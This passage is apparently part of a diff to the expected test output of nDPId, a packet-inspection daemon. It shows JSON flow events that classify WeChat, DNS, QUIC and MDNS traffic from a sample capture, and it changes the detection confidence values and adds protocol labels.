port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167367159,"flow_last_seen":1492167379000,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54093,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167378674,"flow_last_seen":1492167401175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":15799,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1492167378926,"flow_last_seen":1492167401170,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8225,"flow_tot_l4_payload_len":23125,"flow_avg_l4_payload_len":592,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167380581,"flow_last_seen":1492167401124,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1492167400812,"flow_last_seen":1492167448100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":17075,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
-00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1492167401063,"flow_last_seen":1492167448091,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":12550,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1492167452759,"flow_last_seen":1492167467498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":32873,"flow_avg_l4_payload_len":608,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1492167453010,"flow_last_seen":1492167467495,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":8726,"flow_avg_l4_payload_len":323,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1492167454457,"flow_last_seen":1492167470188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4284,"flow_tot_l4_payload_len":60307,"flow_avg_l4_payload_len":701,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1492167454458,"flow_last_seen":1492167467494,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":16177,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
-00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1492167454818,"flow_last_seen":1492167477932,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3993,"flow_tot_l4_payload_len":57290,"flow_avg_l4_payload_len":596,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167455528,"flow_last_seen":1492167467498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167342857,"flow_last_seen":1492167342893,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167351026,"flow_last_seen":1492167351061,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":55862,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleDocs","breed":"Acceptable","category":"Collaborative"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167378674,"flow_last_seen":1492167401175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":15799,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
+00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1492167378926,"flow_last_seen":1492167401170,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8225,"flow_tot_l4_payload_len":23125,"flow_avg_l4_payload_len":592,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167380581,"flow_last_seen":1492167401124,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1492167400812,"flow_last_seen":1492167448100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":17075,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1492167401063,"flow_last_seen":1492167448091,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":12550,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1492167452759,"flow_last_seen":1492167467498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":32873,"flow_avg_l4_payload_len":608,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
+00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1492167453010,"flow_last_seen":1492167467495,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":8726,"flow_avg_l4_payload_len":323,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1492167454457,"flow_last_seen":1492167470188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4284,"flow_tot_l4_payload_len":60307,"flow_avg_l4_payload_len":701,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1492167454458,"flow_last_seen":1492167467494,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":16177,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1492167454818,"flow_last_seen":1492167477932,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3993,"flow_tot_l4_payload_len":57290,"flow_avg_l4_payload_len":596,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167455528,"flow_last_seen":1492167467498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167342857,"flow_last_seen":1492167342893,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167351026,"flow_last_seen":1492167351061,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":55862,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleDocs","breed":"Acceptable","category":"Collaborative"}} 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167345896,"flow_last_seen":1492167360666,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.78","src_port":53220,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1492167350385,"flow_last_seen":1492167350562,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":6290,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":51507,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167350333,"flow_last_seen":1492167350372,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1492167351067,"flow_last_seen":1492167352398,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4266,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.198.46","src_port":57591,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"QUIC.GoogleDocs","breed":"Acceptable","category":"Collaborative"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1492167350385,"flow_last_seen":1492167350562,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":6290,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":51507,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167350333,"flow_last_seen":1492167350372,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1492167351067,"flow_last_seen":1492167352398,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4266,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.198.46","src_port":57591,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleDocs","breed":"Acceptable","category":"Collaborative"}} 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1492167345896,"flow_last_seen":1492167360663,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.78","src_port":47627,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167382020,"flow_last_seen":1492167402666,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00592{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167338426,"flow_last_seen":1492167458187,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00583{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167338426,"flow_last_seen":1492167458187,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00668{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1492167382020,"flow_last_seen":1492167402666,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1492167338426,"flow_last_seen":1492167458187,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1492167338426,"flow_last_seen":1492167458187,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 